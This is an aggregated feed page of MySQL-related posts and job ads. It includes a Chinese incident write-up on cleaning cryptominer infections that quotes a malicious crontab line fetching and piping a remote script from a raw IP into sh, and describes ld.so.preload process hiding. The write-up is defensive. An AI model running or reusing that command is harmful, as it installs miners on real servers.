Another possible solution is to split the removal in its two main parts: the caches need to be updated or emptied and the rows need to be removed from the DB. The caches can all be destroyed out of process so the user doesn't have to wait for Fastly or Algolia (maybe only Stream.io? I don't know). This requires a bit of refactoring because some of the code I talked about is also used by other parts of the app.

A more complete solution is to go a step further from the second solution and also clean up all the leftovers (comments, notifications and buffer updates) but there might be a reason why they are left there in the first place. All these three entities can be removed in a separate job because two out of three have before destroy callbacks which trigger other stuff I haven't looked at.

This should definitely be enough for the user to never encounter again the pesky timeout error. To go an extra mile we could also look into the fact ActiveRecord issues a single DELETE for each object it removes from the database but this is definitely too much for now. I would annotate this somewhere and come back to it after the refactoring if needed.

Conclusions

If you are still with me, thank you. It took me quite a while to write this :-D

I don't have any mighty conclusions. I hope this deep dive in dev.to's source code served at least a purpose. For me it has been a great way to learn a bit more and write about something that non-Rails developers in here might not know but more importantly to help potential contributors.

I'm definitely hoping from some feedback ;-)


          When is a MySQL error not a MySQL error      Cache   Translate Page      

Photo by Cassidy Mills on Unsplash

I came across this error recently: Mysql2::Error: Can't connect to MySQL server on 'some-db-server.example.com' (113)

A quick search on the Internet, resulted in various Q & A sites hinting at a connectivity/routing issue to/from the MySQL server.

Whilst this was probably enough information for me to fix, if the problem exists on a 3rd party's infrastructure you want to provide a bit more information.

The first port of call was to see if the error code 113 appears in the MySQL reference. You can imagine my surprise when I couldn't find 113 anywhere in this chapter.

Luckily there is help available from MySQL in the form of a utility called perror that allows you to look up MySQL error codes.

By typing perror along with error code, you'll get the following:

$ perror 113
OS error code 113:  No route to host

So the reason we can't find this error in either the Client or Server sections of the MySQL reference manual is that it's an operating system error.

The operating system in question is Linux, so we know we're looking for C error number codes (errno.h). If you've got access to the kernel source you can find it in /usr/src/linux-source-<VERSION>/include/uapi/asm-generic/errno.h if you don't have the source installed you can see it see a definition of 113 GitHub:

#define    EHOSTUNREACH    113    /* No route to host */

So armed with this information, I could contact the 3rd party and ask them to check routing and firewall rules between us and the database server.


          Learning how to learn: CS Edition      Cache   Translate Page      

I never thought I would be a Software Engineer, back when I was little I used to have the firm conviction to be an Architect, but something happened... I realized that the more I grew up the more I became more interested in Computers. After my third semester of High School (I live in México, and in my state, public High School lasts 4 semesters) I came with an answer: I was decided to do a BS in Computer Science.

Lets go forward 4 months after I started university. It was the end of my first semester in school (2015, 3 years ago), just 4 months of experience coding, my first programming class was object oriented programming and the deadline of my first final project in my CS degree was 1 week away.

An ERP system to manage the students, professors, classes and schedules of a university using a MySql Database.

I wanted to cry. Like, literally. It was my first project in my CS career and I was stuck. What is a database? What is SQL? What is a non-relational database? What is a database management system? How can I connect my Java code to a database? I used to have a lot of questions like those, I had no experience and I had no idea in how to do those things.

Of course that I could have just copied code from stack overflow or pages like that, but I NEEDED to know how things work. For me, copying is just not enough. I was trying to finish the project, doing all from scratch and by my own.

I remember those nights of searching online in a lot of videos, web pages, books, everything... just to bring to my head new questions. I was totally lost. Searching the web was just doing harm to myself, Computer Science is an ocean of information and I was in the middle of that ocean with no clue of where I was, what to do or what information to search.

Our team finished the project with help of other students from higher semesters.

I still remember the feeling. The sensation that you know nothing, that even if you put all your effort in searching information, you don't understand anything, everything seems to be written in a foreign language (Actually it was, everything was in English, but you understand the point).

Even 6 months later, after a C programming class, searching how to do web programming was like... wait what the hell is a framework and why do people recommend tons of them? What is Django? Backend? Frontend? What is the difference between a framework and a library? Maybe I was too slow, but that was a lot of information for me.

So I don't know if it was just me or everyone feels this way at the beginning, but I was very lost, I had the wish to learn more, but trying that just left me with more questions.

Do I still feel the same?

No. Absolutely no. I think that at some point of my degree I learned how to learn. This is a very import skill, because as a Software Engineer, you need to be updated with new technologies and you need to have the ability to learn new tech and tools as you walk through your career.

Maybe, eventually, everyone gets to this point. The point where you can surely read any documentation online and pick a new language. The point where you can read about new tech without being completely lost. The point where you can learn whatever you want online, just with a little patience.

But maybe not, maybe some people gets so frustrated that decides to quit CS, maybe some people will convince themselves thinking: "This is not for me". If you are getting to that point of frustration let me tell you something, you are not alone, everyone in the developers community is here to help you.

Do Not Give Up.

The next tips are for you. I want to give you some of my little experience as a CS Student in how to start diving in this beautiful ocean of knowledge. Keep in mind that this tips were the little things that helped me out to be a better learner, this tips may not be useful for your situation because we are all different.

Ask for help

Maybe it sounds obvious, but it is not. Sometimes our pride doesn't let us to ask for help, even tho it is a normal and healthy thing to do.

Don't expect someone giving you all the answers. Ask for advice, ask for experiences, try to understand how they learned what they know, try to figure out what do you need to start to study to get to the level where they are. Ask for advice to know how you will start tackling all the information that is out there.

Be Social

Going to Campus Party México (A tech convention full of conferences) has been one of the best experiences of my life. I spent 8 hours traveling in a bus with a bunch of strangers across the country just to meet new people and to learn all that I could about technology.

Talking to all the devs, the hackers, the creative people and even the business people, all of that helped me to grow in an incredible way.

Having conversations with people that have more experience than you is like reading a good book. It's amazing. You get to know experiences that will help you through you journey, knowing what is going to come and how they affronted those situations is a great opportunity for you to think about how you could react to similar situations. You start to discover a lot of things that you were unaware of.

Math is fun

Not everybody thinks this way but I do.

Having a good background in math is very helpful for every programmer. Probably in you daily work you will not use derivatives and integrals BUT algebra, calculus, probability and geometry will give you an excellent sense of logic.

I am not saying that you have to be good at math to be a good dev. My point is that, in my case, I can see a relation between having more ability with math and having more understanding in how a computer works and more ease writing code.

Read Read and Read

Reading is fundamental for your development. Articles like the ones that you can find here or in any development site are very helpful.

Be a proactive student, don't be satisfied with the information that you get in the school, in the bootcamp or in the online-course.

You need to be hungry of information. Time is not an excuse, I read "Clean Code" by Robert C. Martin between my Uni classes even tho I work halftime as a Web Dev.

If I can do it, you surely can.

Make CS an important part of your life

After a few months into my degree I realized that making CS a constant topic in my life, and I am not including here my "Academic Life", was a great way to learn about short topics in a fun and fast way.

When I say "Make CS an important part of my life" I am referring to little things like, following YouTube channels about CS, following devs in Twitter, going to conferences about tech, making CS a topic of conversation with other devs/classmates instead of talking about the last-night episode of -insert favorite show- and even talking with my Uni professors about their experience in the tech industry.

I am not saying that you should leave all your hobbies to live a 100% software engineering life. I am saying that you should consider CS as another hobbie in your life.

It's okey if this is too much CS for you, some people prefer to think about this things only in their work time. But, if you are like me and you absolutely LOVE coding and learning new things about tech everyday, you should consider this advice.

Do not stress out

This point is very important. Always keep calm.

NO ONE knows everything, so keep calm. It is okey if you don't understand some topic, it is okey if you don't understand some tech and it is okey if you just don't 'feel' to learn it.

I used to stress out a lot because my skills in web development (specially front-end) are not the best out there, but after some time thinking about what I really want in my life I realized that web development Its just not my thing.

So, after all, there was no point in getting stressed because I didn't know the latest JavaScript framework or because I didn't know how to do good front end design if at the end of the day I was going to pursue the low level programming and algorithms path.

Those were some aspects of my life as student that helped me to learn more and faster. Maybe those points do not apply for you, but I feel the need to bring new ideas to the discussion, because after all, communities like this one helped me in my introduction to this industry.

Sometimes you can feel down, sometimes you can feel that your productivity levels are really low and that you are not learning anything, but let me say to you this: Eventually, everything gets better, just keep going, keep learning, keep putting effort in what you want.

"Everything in this life has a fix, except death" So enjoy your life learning what you love.

Thank you for reading ~


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          python,mysql,qt programmer needed      Cache   Translate Page      
Hello, I have an ongoing project in python using pyqt4. I need it done asap. The project is 75% complete. Database is designed, UI is there . If you have 100 hour+ experience in programming in python,It is an easy job... (Budget: $250 - $750 USD, Jobs: Python)
          WordPress Site Hacked - Opens Up Third Party Sites After Few Seconds      Cache   Translate Page      
My web design client's WordPress site hacked opens up third party websites in new windows after a few seconds. Fix right now. Work on live server. Unlimited changes until we accept the work. $15 max. (Budget: $10 - $30 USD, Jobs: HTML, MySQL, PHP, Website Design, WordPress)
          Help me create a SQL statement to find spam in my forum database      Cache   Translate Page      
Hi! I have a phpBB forum that has accumulated a number of spam posts over the years. I need to create a simple SQL statement that will find the posts that contain the strings: -http -https -www. .com... (Budget: $10 - $30 AUD, Jobs: Forum Software, MySQL, SQL)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          挖矿程序中毒分析(有这篇够不)      Cache   Translate Page      

常在河边走,哪能不湿鞋?

这不,昨天在朋友技术群里又见到了挖矿被中毒的场景......


挖矿程序中毒分析(有这篇够不)

猛然间想起自己帮媳妇儿公司处理过hadoop管理平台yarn弱口令漏洞被利用,

从而成为挖矿者俘虏的往事。

以前案例现象:

访问yarn:8088页面发现一直有任务在跑如图:


挖矿程序中毒分析(有这篇够不)

用户为dr.who,问下内部使用人员,都没有任务在跑;

结论:

服务器被中毒了, 者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行 ,***者可以在未授权的情况下远程执行代码的安全问题进行预警。

用top命令发现cpu使用了360%多,系统会很卡。

解决办法:

1,通过查看占用cpu高得进程,kill掉此进程

2,检查/tmp和/var/tmp目录,删除java、ppc、w.conf等异常文件

3 ,通过crontab -l 查看有一个 * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任务,删除此任务

4,排查YARN日志,确认异常的application,删除处理

再通过top验证看是否还有高cpu进程,如果有,kill掉,没有的话应该正常了。

注意:YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何 则就均可利用其进行远程命令执行,从而进行挖矿等行为, 直接利用开放在8088的REST API提交执行命令,来实现在服务器内下载执行.sh脚本,从而再进一步下载启动挖矿程序达到挖矿的目的,因此注意并启用Kerberos认证功能,禁止匿名访问修改8088端口


挖矿程序中毒分析(有这篇够不)

于是,自告奋勇,以为还是类似的情景。


挖矿程序中毒分析(有这篇够不)

技技术群对话~~


挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
加密的脚本内容:
挖矿程序中毒分析(有这篇够不)

解密后脚本节选:


挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)

于是忍不住了,


挖矿程序中毒分析(有这篇够不)

问了下自己远程连接操刀

删除了几番试试,

按照脚本反其道而行之,

结果还是杀不干净.top能看到cpu 100%爆满.

就是看不清是那个程序占用.?

由于网络延时,没截图。

于是想肯定是top被替换了,

继续看了一下脚本,

原来是一张图片内嵌至伪造的同名库文件里,

同时库文件调用了下载程序的执行脚本,

top一下程序自动运行,并且子孙无穷尽。


挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
(脚本是解密后放在自己服务器截的图)

本想干掉这个top的库文件,

但由于命名的诱惑性,

外加上杀不干净的程序,

当执行rm -rf时,

也明显感受到对方朋友的紧张。

于是了解业务后,

发现机器影响的业务并不严重.

也快下班了,于是不想再折腾了。


挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)
仔细再次溜了一遍脚本,

想再装系统之前和对方朋友涨涨姿势的,

但感觉到对方朋友

其实并不是乐意于彻底学习这个问题,

于是建议其重装。

事后,坐地铁总结了一下。


挖矿程序中毒分析(有这篇够不)

常见的挖矿中毒程序处理方式

处理过程的思路和建议方法。

1.服务器怎么会中挖矿***程序

肉鸡 弱口令 webshell xss 软件漏洞bug redis zk mysql 0day yarn等造成服务器被扫描并且提权。

2 首先遇到这样情况,我们杀掉挖矿的程序它会自己起来

没清理干净 定时任务 命令修改 开机自启动文件 历史记录

3.如何处理?

首先根据业务判定,造成业务故障,可选用HA方案切走应用服务,对服务器进行下架切断一切网络来源,进行相关处理。

当然一般处理方案是这样,首先通过iptables或者firewalls防火墙手段封死***者地址,类似与切断网络来源,接下来我们就可以进行分析和处理挖矿的原因。

处理的方式 可以根据挖矿脚本进行分析 一个一个进行处理 对修改的命令和文件进行恢复和删除 。

后期对系统和web进行安全测试,对系统漏洞进行修复.

linux后门入 侵检测工具chkrootkit、RKHunter等的巡检。

系统文件MD5值的对比。其实安全最大的因素是人。

当然监控也非常重要。

4.此次原因分析

Redis存在弱口令导致的此次故障问题,Redis可以通过config配置方式 修改配置目录将自己的key放在服务器上,以达到服务器提权的目的。

Redis 未授权访问缺陷可轻易导致系统被黑:

https://www.seebug.org/vuldb/ssvid-89715

笔者建议出现类似事故后处理的命令:

查看哪个进程占据cup

通过 top 或者使用 ps aux

这个案例通过top 命令看不到哪个进程占用了cup ,查看脚本后执行 cat /etc/ld.so.preload 里面也加载了异常的文件,判断是用于隐藏进程用的, 建议将其内容注释掉或删除,执行ldconfig 然后再使用top 查看下进程;

!
挖矿程序中毒分析(有这篇够不)

疑点:

脚本里面图片在浏览器能打开,本地打不开.怀疑是隐写术(微信后台传不来)


挖矿程序中毒分析(有这篇够不)

本地打不开,隐写工具也打不开。


挖矿程序中毒分析(有这篇够不)

使用 ls -lt /etc | head 查看最近变动的文件目录

或者使用 find 命令加参数 stat 查找最近修改过的文件

当然如果是细心一些的,还是会修改掉文件change时间点的.

查找进程文件删除,执行其中任意 1 条命令即可

ps -ef | grep shutdown [命令] ps aux | grep /bin/bash [命令路径] ps aux | grep bash [命令]

lsof -p PID

cd /proc/4170 [pid]
挖矿程序中毒分析(有这篇够不)
找出系统中所有的僵尸进程

ps aux | grep 'defunct'

ps -ef | grep defunct | grep -v grep | wc -l

清理僵尸进程

ps -e -o ppid,stat | grep Z | cut -d" " -f2 | xargs kill -9

kill -HUP ps -A -ostat,ppid | grep -e '^[Zz]' | awk '{print $2}'
挖矿程序中毒分析(有这篇够不)

查找系统中的定时任务

crontab -l

或者

cd /var/spool/cron #查看这个文件夹下的文件删除

vim /etc/crontab

里面会有一个定时任务并且一般删不掉。 浏览器打开网址是个脚本,通过base64 加密,解密即可看到脚本内容。

还要注意随机启动脚本.

根据脚本删除脚本创建的文件,我这里期望删除的是

/usr/local/lib/dns.so ,/etc/ld.so.preload

查看系统登录日志

日志文件 /var/log/wtmp ,系统的每一次登录,都会在此日志中添加记录,为了防止有人篡改,该文件为二进制文件

cd /var/log ; last 或者 last -f /var/log/wtmp

当然这个案例里面日志都是被清掉的.


挖矿程序中毒分析(有这篇够不)

删除历史操作命令,防止***进入查看你做了哪些操作

history 命令来查看历史命令


挖矿程序中毒分析(有这篇够不)
history -c 是清除当前shell的历史纪录,因为系统一般会把信息保存在一个文件中,只要文件中内容没有改变,那么信息也不会变。linux中存放历史命令的文件是.bash_history,清空该文件(echo ‘’ > /root/.bash_history),那些历史命令就会被清空了。

如果是在shell脚本中调用 history -c 清空当前shell的历史命令,是不会成功的,因为bash执行命令时默认是会产生一个子进程来执行该命令,在子进程中执行 history -c 不是清除你当前shell的历史命令了。

可以使用source来执行脚本(source ./脚本),source 指在当前bash环境下执行命令。

关闭不需要的端口

屏蔽访问脚本中的域名 ip,关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP

如果安装了redis ,修改redis 端口,设置复杂高一些密码 。


挖矿程序中毒分析(有这篇够不)
挖矿程序中毒分析(有这篇够不)

大佬们看完多多留言指教。

就此别过!


          Adriod Developer - vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDK’s, API, HTML,CSS, MYSQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          database ..      Cache   Translate Page      
Knowledge of databse is required (Budget: $10 - $30 USD, Jobs: Database Administration, Database Development, Database Programming, MySQL, SQL)
          Looking for CodeIgniter developer to make a custom      Cache   Translate Page      
1. On admin side for user role add the option to enable/disable (Edit, Delete) 2. On admin side add the option to enable/disable the user settings 3. Fix languages problems some words are not being translate (Budget: $10 - $30 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Software Architecture)
          Need Codeigniter Developers to develop Websites      Cache   Translate Page      
Need Codeigniter Developers to develop Websites (Budget: $2 - $8 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Website Design)
          Migrate ALL my website from VLDPersonals to Chameleon social      Cache   Translate Page      
I want to migrate all profiles, pictures, blogs texts and functionnalities of my website to the Chameleon social script : https://www.chameleonsoftwareonline.com/fr/index.php (Budget: €12 - €18 EUR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Learning Management system      Cache   Translate Page      
looking for who can build customize learning management system in PHP or any high secure language like Edx and others (Budget: ₹37500 - ₹75000 INR, Jobs: HTML, MySQL, PHP, Software Architecture, Website Design)
          database ..      Cache   Translate Page      
Knowledge of databse is required (Budget: $10 - $30 USD, Jobs: Database Administration, Database Development, Database Programming, MySQL, SQL)
          Looking for CodeIgniter developer to make a custom      Cache   Translate Page      
1. On admin side for user role add the option to enable/disable (Edit, Delete) 2. On admin side add the option to enable/disable the user settings 3. Fix languages problems some words are not being translate (Budget: $10 - $30 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Software Architecture)
          MySQL事务&并发实际操合集      Cache   Translate Page      
1. "UPDATE tbl SET count = count - 10 WHERE id = 1"这种SQL能否保证并发事务安全。 答:可以,UPDATE操作会针对id加锁,且"x = x - y"会再最新提交的结果上计算。 演示: t1 [crayon-5bbd71655ca21030773566/] t2 [crayon-5bbd71655ca2b236810088/] 然后会发现t2卡住了,即被锁了。如果你有查询锁权限,应该可以看到锁 然后提交t1,再提交t2,最后结果是正确的。 2.    
          need script for server to get scores from sites and post to server      Cache   Translate Page      
i need help with a script that will run over and over going to a few websites getting scores of various teams and sports. and then printing the data on a page on my server in a format we set (Budget: $30 - $250 USD, Jobs: HTML, Javascript, Linux, MySQL, PHP)
          Website Designer Graphic Design WP and Joomla      Cache   Translate Page      
For ongoing work. Must be prepared to work New Zealand Australian work hours. Most projects are WP or Woo commerce with some Joomla projects. Must have a proven track record of excellence and successful job completion... (Budget: $15 - $25 USD, Jobs: MySQL)
          i need to create html php shopping cart website      Cache   Translate Page      
hi. i am looking for html , php shopping cart script. with backend i need to function :- cart , coupon code , item wise discount , fully invoice discount.. like (Budget: $250 - $750 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          need script for server to get scores from sites and post to server      Cache   Translate Page      
i need help with a script that will run over and over going to a few websites getting scores of various teams and sports. and then printing the data on a page on my server in a format we set (Budget: $30 - $250 USD, Jobs: HTML, Javascript, Linux, MySQL, PHP)
          Web Marketing Specialist II      Cache   Translate Page      
AZ-Phoenix, Web Marketing Specialist II for Axway, Inc. (Phoenix, AZ) Responsible for app engg mngmnt & maintenance of marketing automation platforms. Reqs Bach in Info Tech, Comp Info Sys, Bus or rltd. Reqs 3 yrs of post-Bach exp which must include some exp w/: Web front-end develmnt using HTML, CSS, Javascript, JQuery; Web back-end develmnt using PHP, MySQL, Git; Responsive Web Design; troubleshooting or mo
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          MySQL Books - 2018 has been a very good year      Cache   Translate Page      
Someone once told me you can tell how healthy a software project is by the number of new books each year.  For the past few years the MySQL community has been blessed with one or two books each year. Part of that was the major shift with MySQL 8 changes but part of it was that the vast majority of the changes were fairly minor and did not need detailed explanations. But this year we have been blessed with four new books.  Four very good books on new facets of MySQL.Introducing the MySQL 8 Document Store is the latest book from Dr. Charles Bell on MySQL.  If you have read any other of Dr. Chuck's book you know they are well written with lots of examples.  This is more than a simple introduction with many intermediate and advanced concepts covered in detail. Introducing the MySQL 8 Document Store MySQL & JSON - A Practical Programming Guide by yours truly is a guide for developers who want to get the most of the JSON data type introduced in MySQL 5.7 and improved in MySQL 8.  While I love MySQL's documentation, I wanted to provide detailed examples on how to use the various functions and features of the JSON data type.  MySQL and JSON A Practical Programming Guide Jesper Wisborg Krogh is a busy man at work and somehow found the time to author and co-author two books.  The newest is MySQL Connector/Python Revealed: SQL and NoSQL Data Storage Using MySQL for Python Programmers which I have only just received.  If you are a Python Programmer (or want to be) then you need to order your copy today.  A few chapters in and I am already finding it a great, informative read. MySQL Connector/Python Revealed Jesper and Mikiya Okuno produced a definitive guide to the MySQL NDB cluster with Pro MySQL NDB Cluster.  NDB cluster is often confusing and just different enough from 'regular' MySQL to make you want to have a clear, concise guidebook by your side.  And this is that book. Pro MySQL NDB Cluster RecommendationEach of these books have their own primary MySQL niche (Docstore, JSON, Python & Docstore, and NDB Cluster) but also have deeper breath in that they cover material you either will not find in the documentation or have to distill that information for yourself.  They not only provide valuable tools to learn their primary facets of technology but also provide double service as a reference guide. 
          MySQL Replication Notes      Cache   Translate Page      
The MySQL Replication was my first project as a Database Administrator (DBA) and I have been working with Replication technologies for last few years and I am indebted to contribute my little part for development of this technology. MySQL supports different replication topologies, having better understanding of basic concepts will help you in building and managing various and complex topologies. I am writing here, some of the key points to taken care when you are building MySQL replication. I consider this post as a starting point for building a high performance and consistent MySQL servers.  Let me start with below key points Hardware. MySQL Server Version MySQL Server Configuration Primary Key Storage EngineI will update this post with relevant points, whenever I get time. I am trying to provide generic concepts and it will be applicable to all version of MySQL, however, some of the concepts are new and applicable to latest versions (>5.0). Hardware: Resourcing of the slave must be on par (or better than) for any Master to keep up with the Master. The slave resource includes the following things: Disk IO Computation (vCPU) InnoDB Buffer Pool (RAM) MySQL 5.7 supports Multi Threaded Replication, but are limited to one thread per database. In case of heavy writes (multiple threads) on Master databases, there is a chance that, Slave will be lag behind the Master, since only one thread is applying BINLOG to the Slave per database and its writes are all serialised. MySQL Version: It is highly recommended to have Master and Slave servers should run on same version. Different version of MySQL on slave can affect the SQL execution timings. For example, MySQL 8.0 is comparatively much faster than 5.5. Also, it is worth to consider the features addition, deletion and modifications. MySQL Server Configuration: The MySQL server configuration should be identical, we may have identical hardware resources and same MySQL version, but if MySQL is not configured to utilize the available resources in similar method, there will be changes in execution plan. For example, InnoDB buffer pool size should be configured on MySQL server to utilize the memory. Even if we have a identical hardwares, buffer pool must be configured at the MySQL instance. Primary Key: The primary key plays an important role in Row-Based-Replication (when binlog_format is either ROW or MIXED). Most often, slave lagging behind master while applying RBR event is due to the lack of primary key on the table involved. When no primary key is defined, for each affected row on master, the entire row image has to be compared on a row-by-row basis against the matching table’s data on the slave. This can be explained by how a transaction is performed on master and slave based on the availability of primary key: With Primary Key Without Primary Key On Master Uniquely identifies the row Make use of any available key or performs a full table scan On Slave Uniquely identifies each rows & changes can be quickly applied to appropriate row images on the slave. Entire row image is compared on a row-by-row basis against the matching table’s data on slave. Row-by-row scan can be very expensive and time consuming and cause slave to lag behind master. When there is no primary key defined on a table, InnoDB internally generates a hidden clustered index named GEN_CLUST_INDEX containing row ID values. MySQL replication cannot use this hidden primary key for sort operations, because this hidden row IDs are unique to each MySQL instance and are not consistent between a master and a slave. The best solution is to ensure all tables have a primary key. When there is no unique not null key available on table, at least create an auto-incrementing integer column (surrogate key) as primary key. If immediately, it is not possible to create a primary key on all such tables, there is a workaround to overcome this for short period of time by changing slave rows search algorithm. This is not the scope of this post, I will write future post on this topic. Mixing of Storage Engines: MySQL Replication supports different storage engines on master and slave servers. But, there are few important configuration to be taken care when mixing of storage engines. It should be noted that, InnoDB is a transactional storage engine and MyISAM is a non-transactional. On Rollback: If binlog_format is STATEMENT and when a transaction updates, InnoDB and MyISAM tables and then performs ROLLBACK, only InnoDB tables data is removed and when this statement is written to binlog it will be send to slave, on slave where both the tables are MyISAM will not perform the ROLLBACK, since it does not supports transaction. It will leave the table inconsistent with master. Auto-Increment column: This should be noted that, the way auto-increment is implemented on MyISAM and InnoDB different, MyISAM will lock a entire table to generate auto-increment and the auto-increment is part of a composite key, insert operation on MyISAM table marked as unsafe. Refer this page for better understanding https://dev.mysql.com/doc/refman/8.0/en/replication-features-auto-increment.html Referential Integrity Constraints: InnoDB supports foreign keys and MyISAM does not. Cascading updates and deletes operations on InnoDB tables on master will replicate to slave, only if the tables are InnoDB on both master and slave. This is true for both STATEMENT and ROW based replications. Refer this page for explanation: https://dev.mysql.com/doc/refman/5.7/en/innodb-and-mysql-replication.html Locking: InnoDB performs row-level locking and MyISAM performs table-level locking and all transaction on the slave are executed in a serialized manner, this will negatively impact the slave performance and end up in slave lagging behind the master. Logging: MyISAM is a non-transactional storage engine and transactions are logged into binary log by client thread, immediately after execution, but before the locks are released. If the query is part of the transaction and if there is a InnoDB table involved on same transaction and it is executed before the MyISAM query, then it will not written to binlog immediately after execution, it will wait for either commit or rollback. This is done to ensure, order of execution is same in slave as in the master. Transaction on InnoDB tables will be written to the binary log, only when the transaction is committed. It is highly advisable to use transactional storage engine on MySQL Replication. Mixing of storage engine may leads to inconsistency and performance issues between master and slave server. Though MySQL does not produce any warnings, it should be noted and taken care from our end. Also, the introduction of MySQL 8.0 (from 5.6) with default storage engine as InnoDB and deprecating older ISAM feature indicates the future of MySQL database, it is going to be completely transactional and it is recommended to have InnoDB storage engine. There is a discussion online, about the removal of other storage engines and development on InnoDB engine by Oracle, though it is not scope of this article, as a Database Administrator, I prefer having different storage engine for different use cases and it has been unique feature of MySQL. I hope this post is useful, please share your thoughts / feedbacks on comment section.
          Reduce MySQL Memory Utilization With ProxySQL Multiplexing      Cache   Translate Page      
MySQL Adventures: Reduce MySQL Memory Utilization With ProxySQL Multiplexing In our previous post, we explained about how max_prepared_statement_count can bring production down . This blog is the continuity of that post. If you can read that blog from the below link. How max_prepared_stmt_count bring down the production MySQL system We had set the max_prepared_stmt_count to 20000. But after that, we were facing the below error continuously. Can't create more than max_prepared_stmt_count statements (current value: 20000) We tried to increase it to 25000, 30000 and finally 50000. But unfortunately, we can’t fix it and increasing this value will lead to a memory leak which we explained in our previous blog. We are using ProxySQL to access the database servers. And the architecture looks like below. Multiplexing in ProxySQL: The main purpose of the multiplexing is to reduce the connections to MySQL servers. So we can send thousands of connections to only a hundred backend connections. We enabled multiplexing while setting up the Database environment. But multiplexing will not be work in all the times. ProxySQL has some sense to track the transactions which are executing in that connection. If any transactions are not committed or rollback then, it’ll never use that connection for the next request. It’ll pick another free connection from the connection pool. From the ProxySQL Doc, there are few scenarios where multiplexing is disabled. active transaction Tables are locked. Set queries (like SET FOREIGN_KEY_CHECKS) In our case, the most of the errors are due to prepare statement count. Believe it, this issue made us to reduce the memory utilization also. Get the currently active prepared statements: Run the below query which will give tell us the number of active prepare statements in the backend. SELECT *FROM stats_mysql_globalWHERE variable_name LIKE '%stmt%'; +---------------------------+----------------+| Variable_Name | Variable_Value |+---------------------------+----------------+| Com_backend_stmt_prepare | 168318911 || Com_backend_stmt_execute | 143165882 || Com_backend_stmt_close | 0 || Com_frontend_stmt_prepare | 171609010 || Com_frontend_stmt_execute | 171234713 || Com_frontend_stmt_close | 171234006 || Stmt_Client_Active_Total | 19983 || Stmt_Client_Active_Unique | 4 || Stmt_Server_Active_Total | 84 || Stmt_Server_Active_Unique | 23 || Stmt_Max_Stmt_id | 10002 || Stmt_Cached | 2186 |+---------------------------+----------------+ # You can get the same results in MySQL also MySQL> show status like 'Prepared_stmt_count';+---------------------+-------+| Variable_name | Value |+---------------------+-------+| Prepared_stmt_count | 19983 |+---------------------+-------+ You can see the number of active prepare statements are 19983. while running the query again and again, I could see a random count but those all are more than 19000. And you can see the Com_backend_stmt_close is 0. Yes, ProxySQL will never close the prepared statements in the backend. But there is a mechanism in ProxySQL which allocates 20 prepared statements(20 is the default value) to each connection. Once its executed all 20 statements then the connection will come back to the connection pool and close all 20 statements in one shot. Run the below query to get the default statement count for a connection. proxysql> show variables like "%stmt%"; +--------------------------------+-------+| Variable_name | Value |+--------------------------------+-------+| mysql-max_stmts_per_connection | 20 || mysql-max_stmts_cache | 10000 |+--------------------------------+-------+ There is a great explanation about this variable by René Cannaò who is the founder of ProxtSQL. You can read about that here. Why this much prepared statements are running? As mentioned earlier, proxysql will never close the prepared statements in the backend. We realize that we are getting heavy traffic on both ProxySQL servers and its send it to one Master node. And also the Laravel has all the queries with prepared statement format. That's why we are getting this much prepared statements. Get where the most of the prepared statements are used: Run the below query in proxySQL and this will give you the total count of executed prepared statements on all the databases and the usernames. SELECT username, schemaname, count(*)FROM stats_mysql_prepared_statements_infoGROUP BY 1, 2ORDER BY 3 DESC; +----------+---------------+----------+| username | schemaname | count(*) |+----------+---------------+----------+| DBname | user1 | 2850 || DBname | user2 | 257 || DBname | user3 | 108 || DBname | user1 | 33 || DBname | user2 | 33 || DBname | user1 | 16 || DBname | user1 | 15 